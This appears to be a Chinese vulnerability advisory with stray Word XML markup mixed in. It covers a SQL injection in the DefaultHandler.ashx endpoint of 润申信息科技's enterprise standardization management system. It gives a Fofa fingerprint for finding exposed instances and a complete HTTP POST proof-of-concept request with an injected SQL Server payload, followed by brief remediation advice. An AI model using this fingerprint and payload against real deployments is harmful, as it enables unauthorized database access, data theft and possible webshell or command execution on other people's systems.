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润申信息科技 企业标准化管理系统 DefaultHandler.ashx SQL注入漏洞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漏洞描述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润申信息科技 企业标准化管理系统 DefaultHandler.ashx SQL注入漏洞，攻击者可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。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漏洞复现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Fofa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body="PDCA/js/_publicCom.js"</w:t>
      </w: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7325" cy="2152650"/>
            <wp:effectExtent l="0" t="0" r="5715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界面如下</w:t>
      </w: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21910" cy="2512695"/>
            <wp:effectExtent l="0" t="0" r="13970" b="19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251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POC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POST /ashx/DefaultHandler.ashx HTTP/1.1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Host: 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Content-Type: application/x-www-form-urlencoded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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36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action=GetDetail&amp;status=300&amp;id=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))&lt;0--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2025650"/>
            <wp:effectExtent l="0" t="0" r="63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修复建议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过来用户输入的特殊字符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Sql预编译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C9C0F8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="88C9C0F8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74C3B4E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C74C3B4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VlNmU0MDY3ZjU0MTgxOGRiNjg4OTc5NWFkNGI1NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="185C5A65"/>
    <w:rsid w:val="2F394F21"/>
    <w:rsid w:val="315F1317"/>
    <w:rsid w:val="45A56BF4"/>
    <w:rsid w:val="4CDC5F91"/>
    <w:rsid w:val="73EC4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2023-12-20T03:05:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-20T13:58:30Z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F809960957974BA2AF4DC54E9C5F349A_12</vt:lpwstr>
  </property>
</Properties>
</file>